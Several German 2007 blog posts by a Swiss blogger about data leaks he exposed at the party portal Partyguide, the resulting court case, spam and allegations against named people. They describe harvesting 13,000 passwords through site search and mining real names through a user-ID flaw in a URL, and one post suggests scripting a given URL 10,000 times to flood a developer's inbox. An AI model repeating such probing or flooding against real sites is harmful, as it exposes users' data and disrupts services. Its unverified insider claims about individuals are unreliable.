Ich sehe mich in Zeiten des Pendlerblogs zurückversetzt. Deren Watchblog-Tätigkeit ging den Machern von 20 Minuten anscheinend derart auf den Kecks, dass diese Besucher, die über Links auf dem Pendlerblog herkamen, kurzerhand in die Wüste nach Deutschland schickten:
Ich hoffe es ist ein Unfall in der IT-Abteilung und kein Plan. [...]
20 Minuten hatt ihre Website seit kurzer Zeit so konfiguriert, dass ein Besucher welcher einem 20 Minuten-Link auf dem Pendlerblog folgt, nicht dort im Ziel landet aber über einen sogenannte Redirect (immer) auf einen Artikel der Süddeutschen Zeitung umgeleitet wird.
Quelle: Kommunikatorische Frontalkollision in Sicht (oder eine Zeitung die selbst zensuriert)
Ausweg: VPN & Proxies
Nun gut, dann muss ich halt andere Wege suchen, um auf die von mir so heissgeliebte Party-Community zuzugreifen - via VPN und/oder mit einem Proxy.
Die Macher werden bei der Ansicht der über mich geloggten Daten mittlerweile wohl bemerkt haben, dass ich tatsächlich andere "Wege" gefunden habe, um auf Partyguide zuzugreifen.
Hilfe naht
Bereits hat mir jemand angeboten, einen nicht-öffentlichen Proxy-Server zu verwenden. Danke für das Angebot, doch ich möchte keine unbeteiligten Dritte in die Affäre hineinziehen.
Selbstverständlich freue ich mich dennoch ausserordentlich über Schützenhilfe aus dem Netz - sollte ich gar eine netzweite "Give think eMeidi a proxy"-Aktion starten?
Labels: Partyguide
Freitag, August 17, 2007
Partyguide um 20'000 SFr. geschädigt
Um diese ursprünglich durch schlampige Programmierung verursachte Schadenssumme geht es in der ganzen Partyguide-Posse. Der CTO hat am Mittwoch aber angekündigt, dass der Betrag durchaus noch höher ausfallen könnte, weil man das ganze Ausmass der von mir aufgedeckten und öffentlich gemachten Datenlecks bei Partyguide noch nicht überblickt.
Labels: Partyguide
Freitag, August 17, 2007
Partyguide: Nichts gelernt ...
Letzten Mittwoch, einige Stunden vor der Einvernahme vor Gericht (ohne anschliessende Hauptverhandlung), packte mich die Neugier: Hat Partyguide aus all den aufgedeckten Problemen der letzten 18 Monate etwas gelernt?
Mich nahmen insbesondere folgende zwei Punkte wunder:
- Wurden die Sicherheitsanforderungen an Passwörter verschärft?
- Wurde das Registrieren von gefälschten Benutzerkonten unterbunden?
Die Antwort ist vernichtend: Nein.
Mir war es am Mittwoch, 15. August 2007, möglich ein Benutzerkonto auf den Namen 'art143bis' zu eröffnen und als Passwort den Benutzernamen zu verwenden. Auch überprüft das Script nicht, wie logisch die persönlichen Angaben sind. Weder scheint Partyguide eine Mindestlänge für Formularwerte festgelegt zu haben, noch werden Postleitzahl und Telefonnummer auf Plausibilität geprüft.
Wieso macht man das? Eine Vermutung gibt es: Man will sich nicht nur als "meistbesuchte" Party-Community in der Schweiz feiern, sondern auch als diejenige mit den meisten (gefakten) Benutzern. Dabei sollte doch auch Partyguide realisieren, dass nicht die Quantität der Benutzer eine Rolle für den Marktwert spielt, sondern deren Qualität ...
Tilllate, Lautundspitz, Usgang - prüft ihr neue Benutzer auch so lasch?
Nebenbei ...
Dafür kann ich nun wirklich nichts!
Nachtrag: Partyguide scheint Zugriffe von meiner IP auf die Fehlerseite umzuleiten ...
Labels: Partyguide
Mittwoch, August 15, 2007
Partyguide: Die Posse nimmt kein Ende ...
Heute Mittwoch-Nachmittag stand ich also vor Gericht und musste mich für meine Untaten verantworten - dachte ich zumindest. Im Schlepptau hatte ich viele Kollegen, die die Gelegenheit nutzten, endlich einmal (als Zuschauer) an einer Strafverhandlung teilzunehmen. Es waren derart viele an der Zahl, dass die für Zuschauer reservierte Bankreihe fast aus ihren Nähten platzte. Danke an alle, die mir den "Rücken gestärkt" haben - und auch allen, die mir vorgängig viel Erfolg gewünscht haben.
Lonesome Cowboy
Nachdem wir am Amthaus in der Hodlerstrasse 7 eintraffen, durch die Schleuse gelassen wurden und danach vor Raum 002 warteten, sass da wie erwartet schon jemand auf der Wartebank. Es war definitiv kein Bekannter von uns. Wie sich später herausstellen sollte, war es aber nicht etwa der Anwalt von Partyguide, sondern Oliver Walzer, damals Freelancer, mittlerweile CTO von Partyguide. Während sich sein Chef im sonnigen Kalifornien die Nacht um die Ohren schlägt, vertrat Oliver die Firma vor Gericht.
Oli hat sich bereits mehrere Male in Kommentaren zu meinen Blog-Artikeln als Partyguide-Entwickler zu erkennen gegeben, war mir also (aus virtueller Sicht) kein Unbekannter.
Kein Vergleich möglich
Dieser Umstand führte kurz nach Verhandlungsbeginn bereits zum ersten Problem: Der Richter, auf ein möglichst schlankes und rasches Verfahren bedacht (das kostet alles!), hatte so keine Möglichkeit, die beiden Streithähne Parteien gleich zu einem Vergleich zu bewegen.
Wie ich mir nach der Verhandlung erklären liess, schliessen Kläger und Beklagter bei einem Vergleich einen Vertrag. Darin ist festgehalten, dass der Kläger die Klage zurückzieht, während der Beklagte im Gegenzug einen vereinbarten Betrag zahlt, der Teile des verursachten Aufwandes und Schadens decken.
Erste Abklärungen in dieser Richtung waren aber nicht möglich, da hierzu der Geschäftsführer selbst (oder sein bevollmächtigter Anwalt) hätten vor Ort sein müssen.
Jason Fellmann macht übrigens in einer Privatklage eine Schadenssumme von 20'000 SFr. geltend (Behebung der Sicherheitslücke, Ändern der Passwörter, Information der Benutzer, Verlust von Werbekunden, Imageschaden). Dieser Betrag wird in einem Prozess klar zu belegen sein - in einem Vergleich hinterfragt die Herleitung der Summe aber niemand (ausser höchstens der Beklagte, der aber nichts gegen Fantasiezahlen auswirken kann).
Kollege Smythe stellte einen treffenden Vergleich an: Durch meinen Hack müsste ein Arbeiter mit einem äusserst anständigen Nettolohn von 5'000 SFr. vier Monate lang arbeiten.
Die Vertretung des Klägers kommt zu Wort ...
Der Richter ging deshalb zu der Befragung über. Zuerst kam Oliver an die Reihe, der aus Sicht der "Geschädigten" schilderte, wie sie vom dritten Partyguide-Hack erfuhren und welche Massnahmen sie damals ergriffen. Im Anschluss stellte Richter Riesen einige gezielte Fragen, die ihm relevant erschienen (z.B., ob Partyguide zu dem Zeitpunkt Kreditkartendaten auf dem Server gespeichert hatte). Gemäss Aussagen von Oli entschloss man sich bei Partyguide anscheinend erst deshalb zu einer Anzeige, als ich Jason Fellmann in meinem Blog als "unfähig" bezeichnet hatte.
Erstaunlich war, dass dem Vertreter der Klägerin der Nachname des Mitinhabers von Partyguide, Manuel Kern, entfallen war. Aber es sei sowieso Jason, der in der Angelegenheit die Federführung inne habe.
... und dann der Beklagte
Dann durfte ich auf dem Sessel in der Mitte des Raumes, vor dem Richter und der Protokollführerin, Platz nehmen. Nachdem ich über meine Rechte aufgeklärt worden war und meine Zustimmung gegeben hatte, Aussagen machen zu wollen, durfte ich aus meiner Sicht erklären, wie ich auf das Datenleck stiess. Mit der Partyguide-Suche konnte nach beliebigen Passwörtern gesucht werden, worauf ich innert 7 Tagen 13'000 Passwörter ergatterte. Auch mir stellte der Gerichtspräsident gewisse Fragen, um meinen Antrieb hinter meinem Vorgehen zu ergründen.
To Be Continued ...
Am Schluss teilte der Gerichtspräsident uns Anwesenden mit, dass ein nächstes Treffen unumgänglich sein. Dann aber müsse ein Vertreter von Partyguide erscheinen, der dann auch (wenn nötig) einen Vergleich schliessen könne (sprich der Geschäftsführer). Auf die Frage von Oliver, in welchem Zeitraum die nächste Sitzung etwa stattfinden würde, wurde uns ein Zeitpunkt innerhalb der nächsten Monaten, aber garantiert noch vor Ende Jahr, versprochen.
Die Mühlen mahlen
Juhui. Langsam verstehe ich, wieso die Gesetzeshüter und Strafbehörden nicht mit ihrer Arbeit nachkommen. Übrigens: Wenn ein Vergleich nicht zustande kommt (Oliver machte Andeutungen in diese Richtung - und auch ich habe eigentlich nicht vor, Jason mit meinem sauer verdienten Geld einen neuen Porsche kaufen zu lassen), wird man nicht darum herum kommen, die mächtige Prozessmaschinerie anzuwerfen. Das bedeutet: Gutachten, Gerichts- und Anwaltskosten, die der Verlierer dann bezahlen muss. Dabei bleibt der Weg durch die Instanzen selbstverständlich vorbehalten - wogegen der Swissair-Prozess wie ein Klacks aussehen wird.
Dr Aut hat jedenfalls schon angetönt, dass er nötigenfalls die Lokalität für eine Atriiichete in Lausanne (Bundesgericht) bereitstellen werde.
Labels: Bern, Partyguide, Recht
Montag, August 13, 2007
Als Besucher zum Partyguide-Gerichtstermin
Kommenden Mittwoch, 15. August 2007, werde ich im Amtshaus in Bern im Strafverfahren Partyguide v. think eMeidi (resp. Fellmann v. Aeby) einvernommen. Um 15.30 Uhr geht es los.
Die Einvernahme (mit "evtl. anschliessender Hauptverhandlung") ist öffentlich. Wer als Schaulustiger daran teilnehmen möchte, kündet sein Erscheinen am Besten telefonisch beim Gericht an:
Gerichtskreis VIII Bern-Laupen
Hodlerstrasse 7
3011 Bern
Tel. 031 634 33 34
Achtung: Sollte es zu einem Vergleich kommen, müssen die nicht in das Verfahren involvierten Personen den Raum verlassen. Gemäss einem ortskundigen Kollegen gibt es eine "vorzügliche" Caféteria im Gebäude.
Obligatorische Atriiichete
Vor dem Termin werden ich und Personen aus dem engeren Kollegenkreis an einem ungenannt bleibenden Ort auf einem nicht näher lokalisierten Balkon noch eine Atriiichete durchführen, um danach gemeinsam gegen das Amthaus zu verschieben. Auf jeden Fall werde ich stilgerecht im Blazer erscheinen - aber ohne Krawatte.
Rückblickend wäre es wohl intelligenter gewesen, die Atriiichete nach der Verhandlung durchzuführen - je nachdem müssten einfach die Vorzeichen gedreht werden.
Bedingungslose Gefolgschaft meiner Entourage?
Einige meiner engeren Kollegen werden zugegen sein, wobei ich über deren Motiv nicht ganz sicher bin: Geht es wirklich um Unterstützung, oder wollen sie den arroganten Spätpubertierenden mit der spitzen Feder endlich einmal auf die Schnauze fliegen sehen? Vertrauen kann ich dagegen auf meinen "Rechtsbeistand" (Und ja, werte Agentin, mittlerweile bin ich ein wenig nervös!).
Man munkelt, dass Supporter auch bereits Plakate gemalt wurden mit dem Slogan "Free Özel!" und "Du Siech wirsch so öppis vo iglochet!".
Kläger in Übersee
Bereits jetzt ist aber sicher, dass der Kläger nicht an der Verhandlung teilnehmen wird. Ich erwarte, dass er durch seinen Anwalt vertreten sein wird. Schade, ich hätte dem Mann hinter Partyguide gerne vor der Verhandlung kollegial die Hand geschüttelt.
Labels: Partyguide
Mittwoch, Juli 25, 2007
Partyguide und der pädophile Partyfotograf
Momentan recherchiert Gaudenz Looser von 20 Minuten erneut in der Sache um den pädophilen Partyguide-Fotografen Matthias Gemperle. Die Aufdeckungen machen den Anschein, dass der Fotograf auch nach der viermonatigen Untersuchungshaft bei Partyguide ein- und aus ging - als ehemaliger "Regionalmanager" kannte und kennt Gemperle den Geschäftsführer, Jason Fellmann, persönlich.
Gestern hatte ich die Gelegenheit, mit einem Insider aus den Reihen von Partyguide zu sprechen. Er behauptet, dass viele (leitende) Leute bei Partyguide lange vor der Strafuntersuchung über die "Vorlieben" und Tätigkeiten Gemperles wussten. Niemand schien dies aber anstössig zu finden, noch befürchtete man Auswirkungen auf das Partyportal. Jason selbst scheint Bedenken zerstreut zu haben, indem er immer wieder darauf verwies, wie viel Gemperle für das Portal getan hätte. Wurde der Fotograf primär aus Dankbarkeit geschont?
Und noch auf etwas anderes macht dem Insider Sorgen: Viele der männlichen Partyfotografen seien erstaunlich alt - 30ig bis 40ig-jährig. Ob diese wirklich nur der Fotografie willen dabei sind, fragt der anonym bleibende Kenner von Partyguide? Da ich leider keinen Überblick über das Alter der Fotografen habe, bin ich auf Partyguide angewiesen, diese Behauptung zu widerlegen.
Fazit
Von mir aufgedeckte Sicherheitslücken, der hemdsärmlige Brief an meinen Arbeitgeber, immer wieder anstössigen Bilder (Rechtsradikale, Autobrand von Frauenfeld) und Kommentare, ein pädophiler Partyfotograf, hunderte Gratis-Arbeit verrichtende Helfer, während Werbeeinnahmen fast vollständig dem Inhaber zufliessen (von Transparenz keine Spur!) - irgendetwas ist einfach enorm Faul im Staate Partyguide. Würde man noch viel stärker im Mist herumstochern, kämen wohl noch viele, viele andere schmutzige Dinge hervor. Wer macht den ersten Schritt?
Labels: Partyguide
Dienstag, Juli 24, 2007
Jason nimmt nicht an der Gerichtsverhandlung teil
Danke an Chris für den Link auf nachstehende Meldung:
Die Staatsanwaltschaft geht davon aus, dass der ehemalige Inhaber einer St. Galler Modelagentur mindestens drei minderjährige Mädchen vergewaltigt und fünf sexuell genötigt hat. Die Mädchen waren alle zwischen 12 und 16 Jahre alt.
[...] Der Pädophile, auf dessen Computer grosse Mengen härtester Kinderpornografie gefunden wurden, hatte bis gestern nicht nur zahlreiche Partyguide-Staff-Leute auf der Friends-List, er posierte auch wacker mit ihnen an der Partyguide-Jubiläumsparty vom Wochenende. Für eine Stellungnahme waren gestern weder er noch die Verantwortlichen von Partyguide erreichbar.
Quelle: Pädophiler Fotograf verhöhnt seine Opfer
Partyguide scheint ein Unternehmen zu sein, dass nicht aus eigenen Fehlern zu lernen fähig ist. Das ist bei Sicherheitslücken so - und wohl auch im zwischenmenschlichen Bereich.
Nachtrag: Mittlerweile haben die Verantwortlichen von Partyguide reagiert und lassen verlauten:
«Dieser Fotograf ist und wird nicht mehr für uns tätig sein.» Sein Profil sei gesperrt worden, als die Geschäftsleitung davon erfahren habe, schreibt das telefonisch nicht erreichbare Management. Und: Es bestehe kein Bezug mehr zwischen ihm und Partyguide.ch.
Quelle: Pädophiler Fotograf: Partyguide.ch windet sich
Dann ist ja gut ... Dank: Dominic
Abwesend wegen Ferienaufenthalt
Noch etwas anderes machte mich stutzig: "Nicht erreichbar"? Da war doch was ... Ah, genau. Als ich gestern Abend Jasons Profil auf Partyguide angeschaut habe, fiel mir auf, dass als "Ort" "Kalifornien / Florida (jason.ch) (ZG)" angegeben war. Er scheint sich - wie in seinem Partyguide-Profil bereits vollmundig angekündigt - demnächst in Kalifornien und Florida herumzutreiben (wahrscheinlich wandelt er in Kalifornien auf think eMeidis Spuren: Kalifornien 2007).
Vom 4. bis 29. August macht Jason (ohne Argonauten?) die Vereinigten Staaten unsicher. Dass dilettantische PHP-Programmierer von den Einwanderungsbehörden besonders strikte unter die Lupe genommen werden, ist hingegen nur ein Gerücht.
Das bedeutet für meine Gerichtsverhandlung: Wir werden Jasons Porsche-Cabrio am 15. August nicht in der Nähe der Hodlerstrasse 7 parkieren sehen, noch aus seinem Mund erfahren, von wem und wie das mitteilungsfreudige PHP-Script seinerzeit programmiert wurde. Hingegen wird wohl Jasons Anwalt zugegen sein - inwiefern dieser aber genügend Ahnung von IT hat, wird sich zeigen. Gemäss einem anonymen Tippgeber, der von Jason wegen dem Aufdecken einer Sicherheitslücke auch mit Post eingedeckt wurde, hiess der Anwalt damals Lorenz Höchli.
Noch was: Was wird Jason auf dem grünen Einwanderungsfötzel ankreuzen, wo nach Straftaten gefragt wird?
Labels: Partyguide
Sonntag, Juli 08, 2007
think eMeidi mit Rechtsbeistand auf Partyguide
Zufälle gibt es: Just als ich gestern Abend während Pearls of the 80ies mit meiner Juristin über den bevorstehenden Gerichtstermin plauderte, wollte uns doch tatsächlich ein Handlanger Jasons auf Zelluloid bannen. Natürlich konnten wir uns das Gaudi nicht entgehen lassen.
Bis zum 15. August 2007!
Andere Schnappschüsse
Stelzbockfraktion II
Gestern versuchte unsere Crew etwas neues: Die Fraktion spaltete sich in zwei Gruppen auf. Während die eine, grössere Truppe das Bierhübeli unsicher machte, fuhr die andere im Party-Car nach Luzern. Auch deren Eskapaden sind auf Partyguide bildlich nachzuvollziehen:
- DJ Marques G I
- DJ Marques G II
- Agent C-Wig und seine Bond-Girls
- TGFKACD (The Guy Formerly Known As Cab Driver) und seine Komparsen (was genau macht die Hand der Dame auf Randals Hinterkopf?)
- C-Wig & Fingerin' Rud
- Fingerin' Üelu
Labels: Blogosphäre, Partyguide
Mittwoch, Juli 04, 2007
Gerichtsvorladung: Partyguide v. think eMeidi
Showdown: Am 15. August 2007 treffe ich um 15:30 Uhr in meiner Geburtsstadt auf Jason (und die Argonauten?) zwecks Einvernahme. Der dritte Partyguide Hack, bei dem mir nachfolgendes zu Lasten gelegt wird, jährt sich just in diesen Tagen:
Art. 143bis
Wer ohne Bereicherungsabsicht auf dem Wege von Datenübertragungseinrichtungen unbefugterweise in ein fremdes, gegen seinen Zugriff besonders gesichertes Datenverarbeitungssystem eindringt, wird, auf Antrag, mit Gefängnis oder Busse bestraft.
Ich freue mich, dem fähigen Chefprogrammierer von Partyguide Antlitz in Antlitz gegenüber zu stehen.
Was bisher geschah ...
- 4. Juli 2007 • Vorladung für die Einvernahme vom 15. August 2007 des Gerichtskreises VIII Bern-Laupen
- Mitte Mai • Einvernahme auf dem Polizeiposten Neuenegg zwecks Abklärung der "wirtschaftlichen Verhältnisse" (auf Grund der am 1. Januar 2007 in Kraft getretenen "neuen Strafprozessordnung")
- 27. Februar 2007 • Befragung durch Computerexperten auf der Kantonspolizei Bern-Nordring nach Analyse der "Beweismittel"
- 12. August 2006 • In der BernerZeitung erscheint ein Artikel über den Partyguide-Hack mit dem Titel "Blogger knackt Passwörter"
- 10. August 2006 • In der Abendzeitung heute erscheint ein Artikel über den Partyguide-Hack mit dem Titel "Strafanzeige gegen Blogger"
- 7. August 2006 • Ein Arbeitskollege übermittelt mir eine digitale Kopie des Briefes von Marc Fellmann. Ich stelle den Wisch auf's Netz. Reaktionen aus der Blogosphäre folgen unverzüglich
- 2. August 2006 • Ich kann meinen Server auf dem Polizeiposten Bern-Nordring abholen
- 28. Juli 2006 • Ich kann meine Workstation auf dem Polizeiposten Bern-Nordring abholen
- 25. Juli 2006 • Befragung auf dem Polizeiposten Neuenegg. Anschliessend Hausdurchsuchung mit "Sicherstellung von Beweismitteln". Mein Server und meine Workstation werden (in einem Smart, notabene!) auf Bern chauffiert.
- 11. Juli 2006 • Der Marketing-Verantwortliche bei Partyguide (und Pappi von Jason), Marcel Fellmann, schreibt einen Brief an meinen Arbeitgeber, die Universität Bern (ich erhalte den Brief erst am 7. August 2006 zugespielt)
- 7. Juli 2006 • Einladung zur Befragung auf den Polizeiposten Neuenegg anlässlich eines "Rechtshilfegesuchs des Dezernates Betrug & Wirtschaftskriminalität"; wie es sich während der Befragung herausstellt, hat Partyguide Strafanzeige gegen mich erlassen
- 10. Juni 2006 • Ich publiziere den Artikel "Der dritte Partyguide-Hack"
Eines kann man unseren Justizbehörden jedenfalls nicht vorwerfen lassen: Sie blieben definitiv nicht untätig. Ich bin jedenfalls froh, wenn die Sache am 15. August 2007 ein für alle mal abgeschlossen werden kann.
Labels: Partyguide
Dienstag, Juni 19, 2007
Partyguide lernt ...
Bravo! Langsam scheint die Larifari-Kultur beim Partyfoto-Dienstleister auszusterben.
Im Grund finde es keine schlechte Idee, nur eine bestimmte Art von GET-Variablen zuzulassen und "Verstösse" dagegen umgehend an den Entwickler weiterzuleiten. So kann man nicht nur Hackversuche enttarnen, sondern auch Fehlprogrammierungen aufdecken.
Inwiefern der Endanwender hingegen über das "technische Problem" (= "Hackversuch") informiert werden sollte - darüber kann man sich wohl stundenlang streiten. Ein Schelm, wer die URL www.partyguide.ch/ indexp.php? ld=no& mid=12345& special=einsaetze nun mit einem Script 10'000 Mal aufruft ... und so wohl die Mailbox des Entwicklers sprichwörtlich fluten würde.
Dank: ****
Labels: Partyguide, Sicherheit, Web
Montag, Mai 14, 2007
Partyguide wird zum Spammer
Seit Wochen werde ich von Einladungen genervt, die zwei Partyguide-Benutzer massenhaft auf elektronischem Wege verschicken.
Dem einen, ein kürzlich geschasster Partyguidler, habe ich deswegen die virtuelle Freundschaft bereits gekündet. Mal ehrlich Lulu - du bist ja wirklich ein netter Kerl, doch was zum Teufel interessieren mich Parties ab 16 Jahren in der Zürcher Agglomeration?!
DJDAVE202 (oder wer sich auch immer als diese Person ausgibt) hingegen macht es mir deutlich schwieriger - um nicht zu sagen - unmöglich, seinem nervigen Spam zu entkommen. Dies aus zwei Gründen, die vollumfänglich Partyguide selbst anzulasten sind:
- myFriend wider Willen Mein Username figuriert unter DJDAVE202s myFriends. Ich zähle ihn aber nicht zu meinen myFriends. Anscheinend reicht es aber, wenn der Spammer die zu umwerbenden Personen in seiner Liste hat, um diese zuzuspammen. Eine Möglichkeit besteht (meines Wissens) nicht, mich aus Daves Liste zu löschen. Und falls doch, dann ist diese Funktion (wohlweislich?) sehr gut versteckt.
- Unsubscribe? Hä? Mitgegangen, mitgefangen. Man erhält nun also widerwillig regelmässig Spam-Mails, doch auch in den Mails selber findet sich - entgegen der guten Manier - keine Möglichkeit, sich vom Versand auszuschliessen. Gemeinhin wird diese Möglichkeit als "Unsubscribe" bezeichnet. Na, liebe Argonauten, klingelts? Einerseits verstehe ich ja, dass durch das Fixen der unzähligen Sicherheitslücken keine Zeit blieb, eine derart komplizierte Funktion zu programmieren. Andererseits macht man sich als Versender von Mails so auch strafbar.
Wink mit dem Zaunpfahl
Denn, lieber Jason und Argonauten, seit dem 1. April 2007 gilt das neue Fernmeldegesetz! Es handelt sich übrigens um dasjenige Gesetz, das mir Partyguide bei meinem dritten "Hack" um die Ohren schlagen wollte und folglich auswendig zu kennen scheint:
[...] Durch die Veröffentlichung der Daten hast Du zudem gegen Artikel 50 des FMG verstossen, was ebenfalls mit Haftstrafe bis zu einem Jahr (oder Busse) bestraft wird.
Quelle: Der dritte Partyguide-Hack
Nun, wenn das so ist, hier mal die entsprechenden Strafandrohungen auf Spam:
Vorsätzlicher Spam ist strafbar gemäss Artikel 23 des UWG. [...] Die Strafverfolgung ist Sache der Kantone. Die mögliche Strafe ist Gefängnis oder Busse bis 100'000 Franken.
Quelle: Spamverbot
Rechtslage
Im eben zitierten Kommentar des federführenden BAKOMs liest man zum Thema folgendes:
Nicht jede fernmeldetechnisch gesendete Massenwerbung wird verboten. Es ist aber für jede derartige Werbung zuvor die Einwilligung aller Empfänger nötig (Opt-in).
Ich kann mich nicht erinnern, DJDAVE202 diese Erlaubnis gegeben zu haben.
Jede Massenwerbung muss immer einen korrekten Absender angeben und eine Möglichkeit bieten, weitere Werbung abzulehnen.
Wie oben kritisiert findet sich definitiv eine Unsubscribe-Funktion in den empfangene Mail-Nachrichten. Als Absender ist From: DJDAVE202 <noreply@partyguide.ch> angegeben. Aus meiner Sicht ebenfalls eine Gratwanderung - ist nun DJDAVE202 der Absender, oder doch Partyguide? Dass Antworten auf die Mail-Adresse im virtuellen Nirvana landen, könnte der Gesetzesvollstrecker als unvollständige Anschrift taxieren.
Wie weiter?
Ich bin mir sicher, dass bei Partyguide bald ein hektisches Treiben einsetzen wird, um die angeprangerten Missstände zu beheben.
Und, lieber Jason, lass dir gesagt sein: Sollte es zu keiner Besserung kommen, kann ich ja immer noch Strafanzeige stellen. Dann wäre wieder ein gewisser Gleichstand bei der unnötigen Beschäftigung der Behörden herbeigeführt - die Strafanzeige gegen mich ist immer noch hängig, ohne Hoffnung, dass der Fall in den nächsten Monaten abgeschlossen werden kann (wäre ja zu schön, wenn Untersuchungsrichter sich nur um Partyguide-Hacks kümmern müssten).
Konkurrenz
Ähnliches widerfuhr mir übrigens auch über den anderen Platzhirschen, Tilllate.com. Eine Anfrage bei Silvan Mühlemann (CTO) ergab folgende Auskunft:
Hoi Silvan
Besteht die Möglichkeit, dass ich die Zustellung solcher Einladungen verhindern kann, ohne dem lieben Ex-Partyguidler gleich die Freundschaft zu künden? Am Besten mit einem Link direkt unterhalb der Nachricht. Du weisst ja: 1. April ... Spam ... Verbot.
Danke für das Feedback!
Tschüss
MarioMomentan kannst Du dies nicht. Aber das Feature ist bereits umgesetzt und wartet nur noch auf die Aufschaltung.
Quelle: Mail von Silvan Mühlemann an Mario Aeby, 1. Mai 2007, 17:02 Uhr
Labels: Kunde, Partyguide, Spam
Dienstag, April 03, 2007
Der fünfte Partyguide-Hack
Korrigendum: Huch, wir sind ja schon bei Nummer FÜNF angekommen. Danke, Shift, für den Hinweis.
Hinweis: Es ist - wie immer wenn es um die Sicherheit von Partyguide geht - übertrieben, von einem Hack zu sprechen. Viel eher handelt es sich um ein Datenleck, durch das mit minimalsten Kenntnissen von Web-Programmierung vertrauliche Daten von Benutzern des Portals eingesehen werden konnten.
Das Problem wurde mittlerweile beseitigt, weshalb ich keine Bedenken mehr habe, das Leck öffentlich zu machen.
Wie immer: Geschwätzig!
Das Leck offenbarte sich im angesprochenen Fall über das PHP-Script, das Staff-Mitglieder mit Foto anzeigt:
Irgend ein spielerisch veranlagter Zeitgenossen war vor einiger Zeit auf die Idee gekommen, eine beliebige Benutzer-ID in die URL einzufügen. Und siehe da - das Script frass die neue ID ohne Überprüfung, ob es sich beim angefragten User tatsächlich um ein Staff-Mitglied handelte. Nicht weiter schlimm, mag man denken - doch blöderweise stand auf der ausgelieferten HTML-Seite auch der reale Namen des Users.
Obwohl die Macher hinter Partyguide erst kürzlich in einem grossen Schweizer Wochenmagazin behaupteten, seit dem "Hackerangriff vom letzten Sommer" Sicherheit einen höheren Stellenwert zu geben, scheint von diesem Vorhaben nicht viel in Praxis umgesetzt worden zu sein. Auch weiterhin galt bei diesem Script (wie wohl auch bei Dutzend anderem auf dem Server) das Motto: "Wir trauen jeglichen Anfragen, die von Besuchern unserer Seite eintreffen." Tragisch, aber wahr.
Data Mining
Natürlich reizt dieser Datenfundus, um mit statistischen Methoden Untersuchungen anzustellen. Nachfolgend zwei interessante Entdeckungen:
Hauptkritikpunkt: Registration nur mit plausiblen Angaben? Nicht bei uns!
Bei Partyguide kann Mitglied werden, wessen Namen ". ." lautet. Dies öffnet Tor und Riegel, um sich in Kürze unzählige Fake-Accounts zuzulegen. Als positiver Nebeneffekt kann sich Partyguide dann damit brüsten, so und soviele hunderttausend Benutzer registriert zu haben.
Der Beweis für die Laxheit der Überprüfung von Formular-Angaben mit einer Auflistung von komischen Benutzerangaben (die Zeichenlänge von Vor- und Nachnamen beträgt maximal 8 Zeichen):
| 1. | 89 | A B |
| 2. | 20 | M S |
| 3. | 18 | Ich Du |
| 4. | 15 | Ale Ela |
| 5. | 14 | John Doe |
| 6. | 13 | X Y |
| 7. | 13 | Marco |
| 8. | 12 | Patrick |
| 9. | 12 | A S |
| 10. | 11 | M G |
| 11. | 11 | S M |
| 12. | 10 | A M |
| 13. | 9 | Stefan |
| 14. | 9 | D B |
| 15. | 9 | Sandra |
| 16. | 9 | Jenny |
| 17. | 9 | Daniel |
| 18. | 8 | M B |
| 19. | 8 | Nadine |
| 20. | 8 | Laura |
| 21. | 8 | M W |
| 22. | 8 | S F |
| 23. | 8 | M K |
| 24. | 7 | Vanessa |
| 25. | 7 | Nadja |
| 26. | 7 | Michael |
| 27. | 7 | A D |
| 28. | 7 | Mike |
| 29. | 7 | S B |
| 30. | 6 | P G |
| 31. | 6 | Sarah |
| 32. | 6 | R F |
| 33. | 6 | Pascal |
| 34. | 6 | Nicole |
| 35. | 6 | F S |
| 36. | 6 | Abc Def |
| 37. | 6 | Lisa |
| 38. | 6 | N Z |
| 39. | 6 | P M |
| 40. | 6 | M A |
| 41. | 6 | Sabrina |
| 42. | 6 | M R |
| 43. | 6 | Dsf Sdf |
| 44. | 5 | A H |
| 45. | 5 | Nina |
| 46. | 5 | Asd Asdf |
| 47. | 5 | Adrian |
| 48. | 5 | Melanie |
| 49. | 5 | J W |
| 50. | 5 | Don Juan |
Das andere Problem ist, dass eine Registrierung auch dann zugelassen wird, wenn man in das Feld für Vor- und Nachnamen dieselben Angaben eingibt:
| 1. | 243 | - - |
| 2. | 94 | A A |
| 3. | 78 | Asdf Asdf |
| 4. | 51 | ... ... |
| 5. | 45 | . . |
| 6. | 42 | D D |
| 7. | 38 | X X |
| 8. | 32 | S S |
| 9. | 32 | Bla Bla |
| 10. | 31 | Xxx Xxx |
| 11. | 23 | H H |
| 12. | 21 | Asd Asd |
| 13. | 20 | F F |
| 14. | 20 | M M |
| 15. | 18 | Dd Dd |
| 16. | 18 | .. .. |
| 17. | 16 | Test Test |
| 18. | 15 | R R |
| 19. | 14 | L L |
| 20. | 13 | Hans Hans |
| 21. | 13 | Xx Xx |
| 22. | 12 | Anonym Anonym |
| 23. | 12 | * * |
| 24. | 12 | Sdf Sdf |
| 25. | 12 | Lala Lala |
| 26. | 11 | Xy Xy |
| 27. | 10 | T T |
| 28. | 10 | B B |
| 29. | 10 | J J |
| 30. | 10 | Marco Marco |
| 31. | 9 | Ss Ss |
| 32. | 9 | Tom Tom |
| 33. | 9 | Mike Mike |
| 34. | 9 | Lol Lol |
| 35. | 9 | Asdasd Asdasd |
| 36. | 9 | .... .... |
| 37. | 9 | Gg Gg |
| 38. | 9 | K K |
| 39. | 8 | W W |
| 40. | 8 | Ff Ff |
| 41. | 8 | Hallo Hallo |
| 42. | 8 | Crazy Crazy |
| 43. | 8 | Toni Toni |
| 44. | 8 | G G |
| 45. | 7 | Muster Muster |
| 46. | 7 | Alex Alex |
| 47. | 7 | ??? ??? |
| 48. | 7 | E E |
| 49. | 7 | Unbekannt Unbekannt |
| 50. | 7 | Sam Sam |
Ratschläge
Die Daten liegen zu euren Füssen - säubert die Benutzer-Tabelle doch endlich mal! Mit ein paar Zeilen PHP-Code lässt sich die ganze Chose automatisieren.
Im gleichen Anlauf fände ich eine noch porentiefere Säuberung sinnvoll: Benutzer, die sich seit x Monaten nicht mehr eingeloggt haben, wird ein Mail gesendet, das sie auffordert, sich in den nächsten x Tagen einzuloggen. Ist die Mail-Adresse ungültig oder geschieht bis zum angedrohten Termin kein Login, wird der Account gelöscht.
In Zukunft bitte ich euch, eine anständige Plausibilitätsprüfung bei Neuanmeldungen durchzuführen.
Und last, but not least: Der Sicherheitsaudit wäre immer noch fällig. Solche Datenlecks dürfen einfach nicht auftreten!
Für die Konkurrenz
Bei ca. 30% der untersuchten Accounts wurde kein Namen zurückgeliefert (unter der angefragten User-ID scheinen keine Daten mehr vorhanden zu sein). Vermutlich handelt es sich hierbei um gelöschte Benutzer.
